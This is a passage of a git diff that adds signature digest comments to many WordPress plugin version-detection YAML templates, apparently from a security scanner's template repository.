490a0046304402207b5dfbe890a986ff97b5a7fcfd2681e6f4caccdc450228ccc5cf4a465ee61d9302207aa9baa508b9403f48fe2ad89d4ebb9c2112ff148083bed327f9e3424f3e799b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index c1a44066bb..7f13554588 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ded46ea4f2f2fa11fcbe77b5312e4a675dfe104fb3bcc4f517fc70321cb16b3c0220406bdde7bc857ae9512fab1aee2a25c742ed9439c2e14b97c348bcd603f1bca0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index feed730ee0..3a9eb3371e 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203812d74cb0ee4e1e197b374f6a563bbcfd390a3df38825dabc6d3bc7a78b0b96022100ec27af5a35cb7eb90b9f4a9252e4896192d6ca83df9521edec4324215112eb34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 9b2841e7ca..bc7e32092d 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f23daccaee2ddddab301428fd304de1a4aff89ab74daeda0c882bda8c54479e5022070dd2ed2ce1e5543380c3b2bbc8ab0d6dae4832635f55438615df7dfa8c19d60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 42be14c5df..8104eae7e7 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a86bfe04eb113dc833251cd3153aaa308ddf4fcf37ae6332b4ce152ca513cd400221009c2e1b06334f9af2847d71f052f38f1927a2546a569fd08110223110354a64c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 4e0cd86c3f..f2a4f060a9 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022046abc7b1c6e7c3a414ec85a8dde999c20a554bc31ce7916cefdb4436bcf8ea0302203856b76ccfe9f93d993ce33829d6cffb8e41a4b0849454e68a64eccd4ae440ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 59eadc5e6e..9dff68a7dc 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207dc30aed51554fdc0148cbf213408f4963467d2e7751a3aac7e3aa67025b2402022100b614ddec6da099fab62c3c9e89fe4d6a84f777749ee62aac1dffc03910113474:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 41f7a0075e..4da9e8cbc5 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220251b877d27a9f99cc86c3016487e24d26e0daaffd319d270058ce7262d867a0e022006393d004300b574691cec2261161c379d04c568384af347c160c3555093089d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 7e35a3fb4f..c9c2e18778 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210085227814d6d065a11faef8f6ed5effcf8833fca80a562926a9be8952b9160772022079ca595ebdc4ca8712a5b7b99f68badf838a0a446eb1c6c0dea1096fc1b8df30:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 18c2a7586e..78611170ed 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c43681d26d1aaa62728b091cd72719042b400a40373387153e146bd9c9f77144022100ec23796b705db1163802e0ae80e31ea03a5acfc9c6315a98ec58b343dc115051:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 6bc2aa78f9..95d1ee9b00 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fd48663189d4abfd43bf98a5d7f844f75f8fc8860dfe0c7e0e982b4a214a802c022005eb2a01ed914e7f1863a62f2f5a084017c4157b9237a9308b64e87687bd0a6c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index a43d3352a2..ee69105e8c 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d9da9a1d3b617e0e1d7da46133d7cd2fb2b99b443af111d350354abaad91b102022100904395745601c4121506451e4929dc6dce2f4b299a60e43c1e3093abcc0141a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index e7db9944e4..ab557bce85 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b32d96573d8e2df3d1f9a6dcaec0c1436d189a488ac1a65fa42ef55eaa1184ee0220108fbb96fe5f42172e4fad337ad48d84d83b0c74394d23d34eab08daed1b6ec8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 268bd7b9df..7ca9d6ea00 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a5c9ff0834449ed03bce0799b198676eb8b21c48da914377b060b6d188250bbc02205acf9be7d94fd9befcb88065b95860078a6125ed2489ec6bf6139f46aa180980:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index d7fb2209d1..45484d263f 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f4d46f4f79c582d54c5480cef927ba12ec8de9901a0497758dad6c417fd9d09a02210080763e9ccee1986c595bf7f65afc73c9956b59c00e67c06b99c585dc15957336:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index a1641d4632..317f84cb32 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200a38968aa739ad80379be25d8fb1ea2feb6d196bafd52e4681497a04ab7b8569022060503b22c0d336b14fa5e3bf206222afee13ec5c6b67f57ec820e8e45654bc01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 3b6542683c..fb4bd7743b 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fce3d8dbd541a75202d05c615129c220a0148cd3140e8a2b474e108668074811022100e3738f998a827e75edfa1475846187bb9e7729459c6d27176ecfdfad8cb08b3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 969c280ee1..2a1d0158eb 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206699c8ea937c8456dec8d075145477d457b338a8ad6c27e8bfec00141f56011a02210085d6fa7ede14ddee5682d3302b55239b76a2c37136cbd308077020d343418df5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 1c97c422e4..8982f15282 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022028668485bc1595ae09d1d248a6eac7121d62e8afdb1593da46afe758a1ec253a022100f0ecc94328bdc4c8257a17694540a824ced7f6fbe556b8f12b03502fbbfe44e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 7d861cf06a..19338035d0 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a4592fb9feaae462f7ec5e1da0bc2c202ae1a0718e223bef25da5b689903b363022100db832829942b088e2e563bf7c46d1a1ce7a45648da4e57784e4d2cd8a1c96da1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 540d535ecc..6e77799565 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022071ee9468cc4762dc44d05e154855cba3f6ba50195da039b949c05d74e50b0749022002cba97eeeb9dbae4d96640f40e011ce751bb752ccaf969bd7a4d17a7eb372aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index f089ee37d3..482a3b398b 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202ef3cc600eb522cc409a9d51327be5ae3f4bcb57b5f7253aa971329403496a1a02202faf3a3d5c22923cf2149ebef1062c98b9501bf176e9b6c8ede3cc0038b0ad50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 492d66db68..e874de85b2 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206b2e6d966e3456e9a7bd9c14288128d73d35bff3389f8b4f9ec73b200a4fedb7022065294592c1fbdadcfffaffc6dc55c4e53e7942a7e72e7ac5c00d8831e0c262b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index f8903fa3db..64177f1e27 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a6406dbb2249166f8c9b95108efe61a01eb1a1dc738df4b360ee68023d90e2290220579d279db12dcbe63fc4077f5aae347498298acfd96eff17b98bedf47dfc2933:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index ae2451ca38..13432f3ee7 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201215829bc1ef7b3681df3bd0921addebe361ccef24ff3184c8217f0c74465f1e02203ed0f18db241b267fd52bb27bff52100f126859a75de24115492965af01f6c5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index dcc61d1255..8b0758ea98 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220088f1028002e84c9f3d9e9045935b71ff48b7c9158441e4516fb57ec760068c40220438165ecc651c94a9012ddbedd8a840f25c8296926e322a6b60d4cd765ba7b98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index d1d2c1c1d0..2281b1b98c 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022053fd82222179cb1081c00d0fa939a29bd1ce0e53bb4cac3923508823121da30f02210084b7bd17b0000de21b662453dfc6ca3b9d05209732244927d5b5489bb69063d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5f5e8afed5..7b1b1ed4c8 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022017e8d9f253e23940e1960078ee3f36bf74379c731c94c7c7184e502828ffc77c022100f6acc8fc3ec53ec1be58e0bce7d4a96f5e1d7dd42f52adbf854d6418516a5d7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d15634bb2b..d9e6ad88b6 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220773aa9cb1c7184524cebc26fd56a35d8cc4dff71cbfefe6a4a17cd24eee6421802201a8d7b57ccdfd9ff75b061b43482492a9b858aa93a60f6cb064a546903e85cf4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 7da04be5d3..c4bc1d00c0 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100eb9e325a4e888188b1dc4307d84fd8fbba9719aaf9b302217575dab5650ef380022100c0f53ced53d0e921e281343625a444c275b3c9f63c47b5b0019f074857a620d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index a79253cec5..3d8e7df5c5 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201ffb9e4d1bc958ea908bb81cbed4e94e55d9290a02ca09d7fc96f974a1220b6b022100e78b56f5d481836d78dd241061b5f928e513e3308fa9e9346194326264b6428e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 77fc04a220..b138f59877 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202242a45203097a27e005944caf1ff72fad190dec0ab8a1d1cc32cb41fc20252c0221009951e788e620598241133fce79646887ec65ffc4376317d343d7f17d90a227c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 733f9ee453..db0fb6515c 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022033992357dbe7b14755312e9fe103dad834573582ff9be5c5d0f641a3f104fc1e022100c35bf2b73ab0ec205620aa6e0cf8d763b90b47f4b914100ccd5487d529bf6451:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 0af08f0ac0..401decc811 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022031078f9f6694947be02130359fea4cd1c4b7ca6b9e090137a73e263c834298ae0220153dd3d319455d6bb2e62f4910bd82462ed9ca997f876f233b21b27b6ad7baff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 1e4c77fbca..6ce0642ba7 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207f4126e3e65fe2d2602dddd0374698c68b2d3af820f867f1c785451cb4dcf6c40220098d65cc0770d48adec612c07fdcd61ae24f3ec79e5908f779e38d1274d1d61b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 295e3fe82d..270a106daf 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204fea1feb02ac250218e0e29b5b31adcd35ab22ddd58935b578eb40c9455a2eac022100eb2094acd8575223e2844cfb5637336905ccece49fb756dd196800ccc88fb53a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 862f73201f..b94231cf64 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201dda74920be0e8f3248e940796dd286c742f1a731d89ec806f9bbcb543715773022100d3d2a160943c75903dfd3ff3a7a76e83bb0a080630edd3bbda74d7ab805b29de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 711b64f9d0..f03cf91a8b 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d3b908ac9ecf46e437f295ddc475eec8dc767fdc01d192738a87fc75a9e4ab56022100bef7c7c0db0d3e375f0eded04b1e21bd5e3462637209f312df9ab88f98bd842d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 58ddcfab78..4b5077b8dd 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f5bc96e9c359c479309efb7014d71a9b69e60707cc6d6d1372b36c791b1341ff022100b709bb9b1ee67c73e40b9836c0b030209e6e79ba745590bf5ea441cbeba09fb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 305d74e8ea..ff99e31caa 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201d864af73ae4484819ac91b89de80cd27ad4c349b865c150113520745c2a42e502201dc1b7d646de8e8cc6c401cfde91729306a500df04526ab2bd6b902ca5efaa6c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 668162fc4e..0d720f1543 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022073b42cae910a0a81068fcfef3e180165f7b4ee64667091e9642ea621bab2943b022056b2948974e4d444816e285925b28dec4612706baf70125f41910e836d39ed3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 2a233f389d..f1fc4a092a 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022010569dd0e0c1e12e2438f57b8faf23bef68aaa06fd6407dae4c7ef66860a246c02203c2fdff4b079014810d2087fc7d8b73d01feb2c1ca73d7b09c2b9de93ef242bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index a0d2554492..c9991272f2 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022075ad792937aaeadda383086a3c15a05f64ecaa56e97416b09d4ca68d494c41d60221008ee275b82498609185268b84cfce17cd483200f2509e7394ff9eae3ed32ee421:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 4e5046273d..8b6692af8e 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022028ad689d7a3b86bc3178c0a361867700b248c9f087c96970632dbe3ef274bbee02210084a4f9836ae877e7479a14b02a7b4d22a73f220074da989c6e7f9a2b43ba3492:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index f44cee7980..b9b721e603 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ac6759dcb8f4c917fcfa965891961cf0f2e52c43c6fcd537d887c480de87e94802200add0d39056c3c03dbcb2a7d27dd520ee6f698ee2e087ac14bb44cf901fa2bf9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 39130db767..7858633de5 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c9336dc6aeb01467febbf09aa1c3af9598827e068db10079f773dcc59926302902200f0421060d41d8174708439fab63900614ce38eeee06c8f67059c66f2854d8d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 39c497073c..f84ec0da4d 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022040a94fcf85454556d43f54c7f525c8c65a38a8898da729278a7867801d54c11a022077786c02ef15dbc4c24a5f76815aab0ad15b3d51a55162753e86238ebd39f006:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index b848288b55..a94c27395b 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100aa884548a28f8165765dea1920edb2f856e16fcfa9d3cbe9bf49d90179307f5902202dbeb1677eb499f29ff1476fb0338be07a68c17e61d66dc75141caa9b1cade02:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4d10178692..3110d1aa68 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,3 